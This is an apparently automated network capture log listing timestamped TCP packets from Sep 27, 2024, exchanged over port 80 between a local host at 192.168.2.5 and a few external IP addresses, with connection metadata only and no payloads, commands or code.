                                                                          Sep 27, 2024 04:21:16.344881058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344894886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344904900 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344904900 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344924927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344959021 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.345696926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345740080 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345750093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345761061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.345782995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.345803976 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.345810890 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345822096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345833063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345844984 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345854998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.345866919 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.345866919 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.345896006 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346081018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346092939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346107960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346146107 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346146107 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346191883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346204042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346214056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346225023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346236944 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346256018 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346256018 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346350908 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346385002 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346419096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346427917 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346450090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346450090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346476078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346494913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346506119 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346517086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346527100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346534967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346539021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346565008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346579075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346579075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346611023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346622944 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346622944 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346659899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346659899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346780062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346791983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346847057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346858025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346868992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346879005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346889973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346889973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346889973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346934080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346934080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.346972942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.346992016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.347024918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.347033978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.347033978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.347035885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.347047091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.347078085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.347078085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.347100973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.355104923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.355127096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.355138063 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.355207920 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.355230093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.355242968 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.355254889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.355267048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.355331898 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.355331898 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.355333090 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.370580912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.370594025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.370604992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.370667934 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.370678902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.370678902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.370690107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.370702982 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.370753050 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.370753050 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.370753050 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.374310970 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374324083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374335051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374352932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374362946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374373913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374387026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374419928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374419928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374459982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374495983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374506950 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374516964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374535084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374546051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374552965 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374552965 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374560118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374573946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374586105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374602079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374602079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374784946 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374806881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374824047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374835014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374845028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374855042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374866009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374875069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374875069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374878883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374892950 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374901056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374905109 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374916077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374927044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374938965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.374947071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.374947071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.375224113 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.394365072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.394426107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.394438028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.394479036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.394490004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.394500017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.394511938 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.394514084 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.394514084 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.394560099 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.394560099 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.395565987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.395590067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.395601034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.395657063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.395680904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.395693064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.395704031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.395715952 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.395720959 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.395720959 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.395756960 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.395777941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.396142960 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396153927 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396164894 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396173954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396186113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396207094 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.396253109 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.396265984 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396277905 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396290064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396301031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396311998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396313906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.396322966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396334887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396348953 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.396384001 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.396404982 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396415949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.396456003 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.397934914 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.397964954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.397974968 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398010015 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398025036 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398036957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398037910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398050070 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398062944 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398066998 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398094893 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398118019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398227930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398238897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398247957 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398257017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398267031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398277998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398278952 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398288012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398298025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398308992 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398310900 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398320913 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398344994 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398364067 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398386955 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398427010 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398610115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398621082 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398629904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398634911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398643017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398653030 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398658037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398667097 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398674965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398679018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398689985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398699045 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398705959 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398710012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398719072 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398722887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398735046 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398740053 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398744106 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398762941 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398791075 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.398976088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398986101 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.398996115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399005890 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399015903 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399024010 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399027109 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399038076 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399053097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399056911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399069071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399075031 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399080038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399091959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399101973 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399111986 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399118900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399123907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399135113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399141073 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399148941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399174929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399362087 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399377108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399399042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399409056 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399418116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399422884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399422884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399427891 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399441004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.399454117 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399466991 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.399482012 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404695034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404706955 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404717922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404777050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404783010 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404815912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404820919 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404827118 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404834032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404860973 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404874086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404885054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404896021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404906988 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404918909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.404922962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404936075 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.404958963 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.405019999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.405030966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.405042887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.405056000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.405061007 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.405092955 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.426794052 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.427084923 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.430439949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.430465937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.430476904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.430538893 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.430538893 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.430546045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.430557966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.430574894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.430625916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.430625916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.430655003 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.430706024 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.431763887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.431776047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.431786060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.431840897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.431840897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.431864023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.431874990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.431885958 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.431898117 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.431915045 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.431946039 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.432001114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432013035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432023048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432034969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432045937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432053089 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.432058096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432071924 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.432101011 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.432148933 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432161093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432172060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432187080 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.432194948 CEST4972480192.168.2.5176.113.115.95
